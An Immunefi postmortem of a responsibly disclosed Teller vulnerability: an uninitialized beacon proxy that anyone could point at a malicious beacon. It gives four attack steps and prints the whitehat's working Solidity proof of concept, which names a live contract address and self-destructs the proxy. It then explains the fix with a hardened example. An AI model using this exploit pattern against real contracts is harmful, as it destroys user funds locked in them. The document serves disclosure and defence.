Teller Bug Fix Postmortem and Bug Bounty Launch


Immunefi

Summary

Whitehat Bugdefeat disclosed a critical vulnerability in Teller to Immunefi on July 30. That vulnerability, which consisted of an uninitialized proxy, could have led to a loss of more than 1 million DAI if exploited. No user funds were lost, and the vulnerability has been patched. Although Teller didn’t have a bug bounty program at the time of the report, they are awarding the whitehat with a $50,000 bounty. Since more than 1 million in funds were at risk, the whitehat will also receive the Founders Bounty, offered by ArmorFi CTO Robert Forster via Immunefi. The Founders Bounty is a reward of 125,000 ARMOR tokens, vested over 24 months, which is given out to any hacker who finds a vulnerability in any live Ethereum project where more than 1 million in funds is at risk.

After this stunning success with responsible disclosure, Teller is joining Immunefi with a bug bounty today, featuring a $50,000 award for critical vulnerabilities. You can find more details on Teller’s bug bounty page.

Vulnerability Analysis

The main vulnerability concerned the use of proxy contracts to make Teller contracts upgradeable.

Teller employs the beacon pattern of proxy contracts. The basic idea of this pattern is that the beacon proxy knows the address of the beacon, and the beacon itself points to the implementation code. The beacon proxy then calls that implementation code and uses it as its actual logic. It’s not hard to see how this makes upgrading contracts easier, as when there’s an update, the beacon is informed of the new implementation. Thus, whenever the proxy asks the beacon where the implementation is, it receives a new one and executes it.

However, in Teller’s case, the beacon proxy (InitializeableBeaconProxy) had never been initialized, and it could have been initialized by anyone, including a hypothetical malicious attacker. As long as the stored beacon address remained 0, anyone could have set it, thus breaking the protocol.

The step-by-step attack is as follows:

1. Create a malicious implementation contract which contains a function that will selfdestruct the contract.
2. Create a malicious beacon, which points to that fake implementation.
3. Initialize the beacon proxy to tell it the address of the malicious beacon.
4. Call the beacon proxy, which asks the malicious beacon for its implementation and then delegatecalls into the malicious implementation, at which point the malicious implementation instructs the beacon proxy to selfdestruct.

Once the beacon proxy self-destructs, the tokens (in this case, more than 1 million DAI) are unrecoverable, so while the attacker does not directly realize any of those funds, the protocol itself is permanently broken and user funds lost. This attack vector could have also been used to hold the protocol ransom.

The whitehat’s POC code is available below:

pragma solidity >=0.7.0 <0.9.0; // version pragma added so the PoC compiles as-is

interface InitializeableBeaconProxy {
    function initialize(address beacon, bytes memory data) external payable;
    function kill() external;
}

// Acts as both the malicious beacon (implementation() returns itself) and the
// malicious implementation: kill() executed via delegatecall destroys the caller.
contract Killer {
    function kill() public {
        selfdestruct(payable(msg.sender));
    }

    function implementation() public view returns (address) {
        return address(this);
    }
}

contract Attack {
    function run() external {
        // the uninitialized beacon proxy named in the report
        InitializeableBeaconProxy ibp = InitializeableBeaconProxy(0x08162332b1C13E6d1E80AC0D756aF255d218DC20);
        Killer killer = new Killer();
        ibp.initialize(address(killer), ""); // point the proxy at the malicious beacon
        ibp.kill();    // proxy delegatecalls Killer.kill(), so the proxy self-destructs
        killer.kill(); // remove the helper contract
    }
}

Vulnerability Fix

The fix was simple. Teller initialized the beacon proxy with a beacon address of 1. There is no contract at that address, but it is a valid input. Because the stored beacon address is no longer 0, an attacker can no longer initialize (or reinitialize) the proxy. Any call to the beacon proxy makes the proxy ask address 1 where the implementation is, but since nothing lives at address 1 to answer, the call fails and nothing happens.
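The vulnerable and hardened shapes side by side, as an added example that is neither Teller's code nor the whitehat's PoC; the contract and function names are invented, and the hardened form generalizes Teller's address-1 hotfix by binding the beacon at construction so the "slot is 0" window never exists:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration, not Teller's code. The beacon only answers "where is the
// implementation"; the proxy delegatecalls that address, so the implementation
// runs against the proxy's own storage and balance.
interface IBeacon {
    function implementation() external view returns (address);
}

// Weak shape: the beacon address sits in ordinary storage and is set by a
// separate initialize() call. Until that call happens the slot is 0, and the
// "already initialized" check lets whoever calls first choose the beacon.
contract UninitializedBeaconProxy {
    address public beacon; // a real proxy keeps this in a dedicated slot (EIP-1967)

    function initialize(address beacon_) external {
        require(beacon == address(0), "already initialized");
        beacon = beacon_; // no access control: first caller wins
    }

    fallback() external payable {
        address impl = IBeacon(beacon).implementation();
        // A selfdestruct inside impl runs in the proxy's context and destroys
        // the proxy, which is how the locked funds become unrecoverable.
        (bool ok, bytes memory ret) = impl.delegatecall(msg.data);
        require(ok, string(ret));
    }
}

// Hardened shape: bind the beacon at deployment. Teller's hotfix (initializing
// the slot to address 1 so it can no longer be set) closes the same window
// after the fact; a constructor-bound immutable removes it entirely and keeps
// the proxy's storage empty, so nothing collides with the implementation's layout.
contract BoundBeaconProxy {
    address public immutable beacon;

    constructor(address beacon_) {
        require(beacon_ != address(0), "beacon required");
        beacon = beacon_;
    }

    fallback() external payable {
        address impl = IBeacon(beacon).implementation();
        (bool ok, bytes memory ret) = impl.delegatecall(msg.data);
        require(ok, string(ret));
    }
}
```

Deploying BoundBeaconProxy with a beacon whose implementation() returns a contract that calls selfdestruct still destroys the proxy; the hardening only ensures that the party who picks the beacon is the deployer, not an arbitrary first caller.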

Acknowledgements

We thank the Teller team for their fast and effective response to the disclosure. Teller fixed the critical bug and generously paid out a bounty to the whitehat. Teller, in turn, has thanked Immunefi for helping to facilitate the disclosure. In the aftermath of the disclosure, Teller has decided to host a bug bounty with Immunefi, which launches today.

If you’re interested in protecting your project with a bug bounty like Teller, visit the Immunefi services page and fill out the form.
